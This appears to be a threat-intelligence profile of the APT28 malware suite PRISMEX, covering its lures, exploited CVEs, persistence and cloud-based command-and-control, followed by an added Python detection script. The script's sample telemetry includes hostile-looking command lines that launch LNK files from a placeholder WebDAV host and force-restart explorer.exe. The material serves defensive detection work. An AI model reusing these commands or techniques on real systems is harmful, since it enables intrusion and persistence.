PRISMEX
PRISMEX is a malware suite attributed with high confidence by Trend Micro to the Russia-linked APT28 threat group, also known as Fancy Bear and Pawn Storm. The campaign using PRISMEX has been active since at least September 2025 and intensified in January 2026. It targets Ukraine’s defense supply chain and allied organizations, including government, military, defense, aid, logistics, and other critical support entities in Central and Eastern Europe, with reported targeting including Ukraine, the Czech Republic, Poland, Romania, Slovakia, Slovenia, and Turkey.
The malware is used in spear-phishing operations themed around military training, aid, weather alerts, weapon smuggling, and related logistics. Reported lures include malicious RTF attachments and decoy documents resembling Ukrainian drone inventories, supplier price lists, and military logistics forms. The infection chain reportedly exploited CVE-2026-21509 and CVE-2026-21513 for initial access and silent payload execution.
PRISMEX is described as a multi-component toolkit including a dropper, loader, and implant/stager, with component names reported as PrismexDrop, PrismexLoader, PrismexStager, and PrismexSheet. Its capabilities include stealthy, fileless execution, persistence, encrypted command-and-control, espionage, and sabotage. Trend Micro reported that PRISMEX combines advanced steganography, COM hijacking, and abuse of legitimate cloud services for command and control. PrismexDrop reportedly decrypts payloads, drops files, and establishes persistence via COM hijacking and a scheduled task that restarts explorer.exe. PrismexLoader reportedly acts as a proxy DLL, mimics legitimate system behavior, and uses a custom steganography method called Bit Plane Round Robin to extract hidden payloads from images, then executes them in memory via .NET runtime loading. PrismexStager is described as a heavily obfuscated Covenant-based .NET Grunt stager used for command-and-control and task execution.
For command-and-control, PRISMEX reportedly abuses legitimate cloud services, specifically Filen.io, to blend encrypted traffic with normal activity. The malware suite is explicitly described as supporting both espionage and sabotage, including wiper commands. Reporting also states that researchers believe PRISMEX represents an evolution of the NotDoor ecosystem. High-confidence indicators and artifacts mentioned in the reporting include use of Filen.io for C2, WebDAV infrastructure in the exploit chain, COM hijacking for persistence, scheduled-task-based explorer.exe restart behavior, malicious LNK execution, and image-based steganographic payload concealment.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"Prismex leverages multiple Windows vulnerabilities, Trend Micro said in its late March blog post, including "a confirmed Windows zero-day" in CVE-2026-21513 as well as Microsoft Office bug CVE-2026-21509."
"Trend Micro said the actor ... has been using a collection of malware components known as "Prismex" to target the defense supply-chain of Ukraine and its allies ... "Prismex combines advanced steganography, component object model (COM) hijacking, and legitimate cloud service abuse for command and control," ... The special malware includes both espionage and sabotage capabilities, with the latter including wiper commands."
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Trend Micro said the actor ... has been using a collection of malware components known as "Prismex" to target the defense supply-chain of Ukraine and its allies ... "Prismex combines advanced steganography, component object model (COM) hijacking, and legitimate cloud service abuse for command and control," ... The special malware includes both espionage and sabotage capabilities, with the latter including wiper commands.
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access: 1 technique
Victims who open the attached RTF file trigger exploitation of CVE-2026-21509, which bypasses security controls and forces the system to connect to an attacker-controlled WebDAV server. This automatically retrieves and executes a malicious LNK file without further user interaction.
Execution: 2 techniques
Persistence: 1 technique
Privilege Escalation: 2 techniques
Stealth: 1 technique
Command and Control: 2 techniques
The final component, PrismexStager, connects to command-and-control servers via Filen.io cloud services. This helps attackers blend malicious traffic with normal encrypted communications, making detection harder while enabling data exfiltration and remote control.
Exfiltration: 1 technique
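The behaviours reported for this family (per-user COM hijacking for persistence, a scheduled task that restarts explorer.exe, and an LNK retrieved from a WebDAV server after an Office document is opened) are concrete things a defender can look for in endpoint telemetry. The script below is an added example, not code from Trend Micro, Mallory, or the reporting: it runs three simple detection rules over constructed endpoint events. The event field names (loosely modelled on Sysmon and Security-log fields), the CLSID, the task name and the 203.0.113.10 WebDAV host are all assumptions made for the example and are not indicators from the page.

```python
"""Triage rules for the PRISMEX-style behaviours named in the reporting.

Added example, not the vendor's or Mallory's code. Event shapes are assumed;
all sample values below are constructed (TEST-NET address, made-up CLSID).
"""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Per-user COM server registration: HKCU\Software\Classes\CLSID overrides HKLM,
# which is the mechanism behind COM hijacking. Any such write is worth a look;
# a server DLL in a user-writable directory makes it high severity.
HKCU_COM_SERVER = re.compile(
    r"^HKCU\\Software\\Classes\\CLSID\\\{[0-9A-F-]{36}\}\\(InprocServer32|LocalServer32)",
    re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads)\\", re.I)

# WebDAV UNC forms: \\host@80\... , \\host@SSL\... , or a DavWWWRoot path.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:SSL|\d{1,5})\\|\\DavWWWRoot\\", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    evidence: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[Finding]:
    """Return one Finding per event that matches a rule, in event order."""
    findings: list[Finding] = []
    for ev in events:
        kind = ev.get("type")
        if kind == "registry_set":
            key, data = ev.get("key", ""), ev.get("data", "")
            if HKCU_COM_SERVER.search(key):
                sev = "high" if USER_WRITABLE.search(data) else "medium"
                findings.append(Finding("com_hijack_hkcu_clsid", sev, f"{key} -> {data}"))
        elif kind == "task_registered":
            action = ev.get("action", "")
            # Reporting: a scheduled task restarts explorer.exe so the hijacked
            # COM object gets loaded; a task whose action touches explorer.exe
            # is rare in normal administration.
            if re.search(r"explorer\.exe", action, re.I):
                findings.append(Finding("schtask_explorer_restart", "high",
                                        f"{ev.get('task_name', '?')}: {action}"))
        elif kind == "process_create":
            parent = _basename(ev.get("parent_image", ""))
            cmd = f"{ev.get('image', '')} {ev.get('command_line', '')}".strip()
            if parent in OFFICE_IMAGES and WEBDAV_UNC.search(cmd):
                # Office app spawning anything that references a WebDAV path
                findings.append(Finding("office_webdav_child", "high", cmd))
            elif WEBDAV_UNC.search(cmd) and ".lnk" in cmd.lower():
                findings.append(Finding("webdav_lnk_execution", "high", cmd))
    return findings


# Constructed sample telemetry: four malicious-looking events, three benign.
SAMPLE_EVENTS = [
    {"type": "registry_set", "image": "C:\\Windows\\explorer.exe",
     "key": "HKCU\\Software\\Classes\\CLSID\\{11111111-2222-3333-4444-555555555555}\\InprocServer32",
     "value": "(Default)", "data": "C:\\Users\\alice\\AppData\\Local\\Temp\\cache.dll"},
    {"type": "registry_set", "image": "C:\\Program Files\\Updater\\update.exe",
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "Updater", "data": "C:\\Program Files\\Updater\\update.exe"},
    {"type": "task_registered", "task_name": "\\Microsoft\\Windows\\Shell\\CacheRefresh",
     "action": "C:\\Windows\\System32\\cmd.exe /c taskkill /im explorer.exe /f && start explorer.exe"},
    {"type": "task_registered", "task_name": "\\Updater\\Daily",
     "action": "C:\\Program Files\\Updater\\update.exe /quiet"},
    {"type": "process_create",
     "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\explorer.exe",
     "command_line": "explorer.exe \\\\203.0.113.10@80\\DavWWWRoot\\training.lnk"},
    {"type": "process_create", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c \"\\\\203.0.113.10@80\\DavWWWRoot\\schedule.lnk\""},
    {"type": "process_create", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "command_line": "notepad.exe C:\\Users\\alice\\notes.txt"},
]


def run_sample() -> list[Finding]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.severity}] {f.rule}: {f.evidence}")
```

Each rule is intentionally narrow and keyed to a behaviour the page names; in production the COM rule would also be fed the list of CLSIDs that explorer.exe actually loads so that a hijack of one of those can be scored above a generic per-user registration.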
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware suite used in a spear-phishing campaign attributed to APT28. It includes a dropper, loader, and Covenant-based implant, supports fileless attacks, and uses encrypted command-and-control communications via cloud services such as Filen.io for espionage and persistent access.
A malware framework/component set used by APT28/Pawn Storm for espionage and sabotage. It uses steganography, COM hijacking, and legitimate cloud services for C2, and includes wiper functionality.
A modular malware suite used for espionage and command-and-control. It includes components for payload decryption and persistence, in-memory loading, steganographic payload extraction, COM hijacking, abuse of Filen.io for encrypted C2, and fileless execution to maintain stealthy long-term access.